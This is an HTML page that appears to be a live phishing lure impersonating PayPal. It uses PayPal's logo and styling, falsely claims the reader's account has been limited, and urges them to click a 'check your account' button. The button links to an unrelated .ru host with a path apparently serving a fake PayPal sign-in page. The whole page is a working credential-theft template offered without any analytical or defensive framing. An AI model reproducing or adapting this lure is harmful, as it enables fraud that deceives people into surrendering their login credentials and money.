<html>
<head>
 
 <style>
.contentContainer {
    position: relative;
    width: 400px;
    margin: 135px auto 0 auto;
    margin-top: 135px;
    margin-right: auto;
    margin-bottom: 0px;
    margin-left: auto;
    padding: 0;
    padding-top: 0px;
    padding-right: 0px;
    padding-bottom: 0px;
    padding-left: 0px;
    background-color: #fff;
}
.logo {
    margin: 0 auto;
    background: transparent url(https://www.paypalobjects.com/images/shared/monogram@2x.png)top center no-repeat;
    -moz-background-size: 30px 37px;
    background-size: 30px 37px;
    width: 30px;
    height: 37px;
    display: block;
    text-indent: -999em;
}
#ktba {
    display: block;
    margin: 0 0 10px;
    font-family: "pp-sans-big-light", Helvetica Neue, Arial, sans-serif;
    font-weight: normal;
    font-variant: normal;
    font-size: 2em;
    color: #2c2e2f;
    -webkit-margin-before: 0.67em;
    -webkit-margin-after: 0.67em;
    -webkit-margin-start: 0px;
    -webkit-margin-end: 0px;
   
}
html {
    background-color: #fff;
    position: relative;
    min-height: 100%;
}
body {
    min-height: 100%;
    margin: 0 0 119px;
    padding: 0;
    color: #2c2e2f;
    font-family: "pp-sans-small-regular", Helvetica Neue, Arial, sans-serif;
    font-weight: normal;
    font-variant: normal;
    font-size: 93.75%;
    -webkit-font-smoothing: antialiased;
    -webkit-backface-visibility: hidden;
    -moz-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
    /* -webkit-text-size-adjust: 100%; */
}
footer {
    position: absolute;
    bottom: 0;
    left: 0;
    width: 100%;
    height: 119px;
}
.chal {
    text-align: left;
    border-top: 1px solid #e5e8ea;
    border-top-width: 1px;
    border-top-style: solid;
    border-top-color: rgb(229, 232, 234);
}
.doui {
 
    width: 100%;
    height: 50px;
    padding: 16px;
    padding-top: 16px;
    padding-right: 16px;
    padding-bottom: 16px;
    padding-left: 16px;
    border: 0;
    display: block;
    background: #0070ba;
 
 
 
}
footer ul {
    position: absolute;
    list-style-type: none;
    height: 42px;
    bottom: 0;
    width: 100%;
    text-align: center;
    background-color: #f7f9fa;
}
footer ul li:first-child {
    background: none;
    background-image: none;
    background-position-x: initial;
    background-position-y: initial;
    background-size: initial;
    background-repeat-x: initial;
    background-repeat-y: initial;
    background-attachment: initial;
    background-origin: initial;
    background-clip: initial;
    background-color: initial;
}
footer ul li {
    display: inline-block;
    margin: 0;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
    margin-left: 0px;
    padding: 15px 0 15px .4em;
    padding-top: 15px;
    padding-right: 0px;
    padding-bottom: 15px;
    padding-left: 0.4em;
    font-size: 0.73333333em;
}
footer ul li {
    display: inline-block;
    margin: 0;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
    margin-left: 0px;
    padding: 15px 0 15px .4em;
    padding-top: 15px;
    padding-right: 0px;
    padding-bottom: 15px;
    padding-left: 0.4em;
    font-size: 0.73333333em;
}
footer ul li {
    display: inline-block;
    margin: 0;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
    margin-left: 0px;
    padding: 15px 0 15px .4em;
    padding-top: 15px;
    padding-right: 0px;
    padding-bottom: 15px;
    padding-left: 0.4em;
    font-size: 0.73333333em;
}
 
</style>
 
</head>
<body>
<br>
<br>
 
<center>
 
<div class="contentContainer" id="content"><div><div id="challenges" class="textCenter challenges panel">
  <div class="logo" ></div>
<br>
<h1 id="ktba">Your account has been limited.</td>
<br>
<p style="color:#0FA1DF;font-size:27px;font-family:verdana,arial;">Dear customer.
</p>
 
<span style="font-family:Arial;font-size:16px;color: #1f1e1e;">We have noticed that some data from your account information seems inaccurate or unverified. You have to check your information in order to continue using our service smoothly, please check your account information by clicking the link below.
 
<br></span>
<ul class="chal"></ul>
 
 
<div style="text-align: center;">
<a href="http://a0326294.xsph.ru/CLEAN-PrinceDuscam/app/signin" style="FONT-SIZE:14px;FONT-FAMILY:Arial;WIDTH:100%;COLOR:#fff;TEXT-ALIGN:center;DISPLAY:inline-block;BACKGROUND-COLOR:#0070ba;border-radius:50px;line-height:50px"><strong>
check your account </strong></a>
 
    </div>
 
 
</div>
</div>
</div>
 
</body>
</html>